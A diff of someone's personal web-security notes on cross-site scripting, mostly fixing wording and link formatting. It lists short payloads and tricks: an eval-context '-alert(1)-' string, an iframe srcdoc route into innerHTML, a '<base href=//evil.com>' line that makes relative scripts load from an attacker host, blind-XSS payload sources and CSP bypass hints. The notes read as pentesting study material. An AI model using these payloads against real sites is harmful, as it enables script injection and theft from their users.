abhaynayar/obsidian/notes/web.md

 - Strings can be concatenated using minus `-` sign.
 In a js `eval` context you can use: `"-alert(1)-"`
 - Chrome, Firefox, Safari encode `location.search` and `location.hash`.
 IE11 and Edge (pre-Chromium) don't encode sources.
 - To pop XSS in `innerHTML` first load the script into `iframe srcdoc` then load that `iframe` into the `innerHTML`.
-- If there is any encoded entities `&lt;` and `&gt;` see if there are any `unescape` calls you can pass them through.
+- If there are any encoded entities `&lt;` and `&gt;` see if there are any `unescape` calls you can pass them through.
 - `<base href=//evil.com>` allows you to change all relative URLs.
 For example `<script src=/xss.js>` will use `evil.com` to retrieve `xss.js`.
 - XSS can also be done through file-uploads in case HTML or SVG files are allowed to be uploaded.
 - Blind XSS:
-    - Read `https://brutelogic.com.br/blog/blind-xss-code/` get the code here `http://brutelogic.com.br/brutal/blind/index.txt`.
+    - Read https://brutelogic.com.br/blog/blind-xss-code/ and get the code here: http://brutelogic.com.br/brutal/blind/index.txt
-    - Use `http://xss.rocks/xss.js` for including an `alert()` js file.
+    - Use http://xss.rocks/xss.js for including an `alert()` js file.
-    - Use `xsshunter.com` to test for blind xss.
+    - Use http://xsshunter.com to test for blind xss.
 - CSP Bypass:
     - In your devtools, look at the network tab and within the headers for the response, you'll see the CSP header.
-    - You can also copy the url and put it into Google's CSP Evaluator at: `csp-evaluator.withgoogle.com`
+    - You can also copy the url and put it into Google's CSP Evaluator at: https://csp-evaluator.withgoogle.com
     - If `default-src` is `self`, it can be problematic if the user can upload files.
 - [XSS in postMessage](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#xss-in-postmessage)